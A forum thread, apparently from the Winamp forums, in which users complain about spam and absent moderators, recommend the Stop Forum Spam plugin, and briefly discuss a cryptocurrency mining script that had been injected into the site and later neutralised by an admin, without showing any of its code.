So about this forum & spam

Any chance we can have more active mods to clear out all the random spam? I feel like like I daily come to this site to report spam, and while i'm not criticizing mods around here, I feel like we could clean this place up more if we had more active mods doing whats needed w/o needing to have someone reporting first...

I've suggested on several occasions that they need to install the Stop Forum Spam plugin we use it on another forum I'm an admin on and it works 99.8% of the time stopping spammers from signing up and more importantly not spamming the forum.

But then again Radionomy don't care about these forums and it seems they care even less about Winamp.

But is it up to radionomy? I thought at least admins could assign other people as admins, and I know DJ Egg was able to remove the malicious code from the forums, so maybe it's not up to radionomy per se

Stop forum spam plugin for forums stops the malicious spam posts and spammers before they even get chance to post spam it works 99.8% of the time. That odd time its not a spammer known to the SFS database and you can setup and account with them to add spammers details.

Having moderators can eliminate the spam that little bit better but moderators aren't always able to get to a computer to remove stuff or even interested in helping a forum.

(Do any of the old moderators even log on anymore? I see user names listed on the forums)

Anything a website can do to stop spammers has to be a good thing surely?

I think that this is called "real life' catching up , growing up , starting a family etc etc
most of them grew up and left to real life.

I do hope Egg is alright .

That's given, especially since winamp development has been MIA. Though the real question is, why have their names listed as mods if they abandoned their accounts and responsibilities?

NoScript nixes the actual mining script.

True (and I actually recently switched back to firefox w/ noscript) but it looks like Egg already 'commented'/nulled it out. It still raises the question how this happened.

Norton Security blocks the whole forums site as long this codemining script is still visible in the source code.
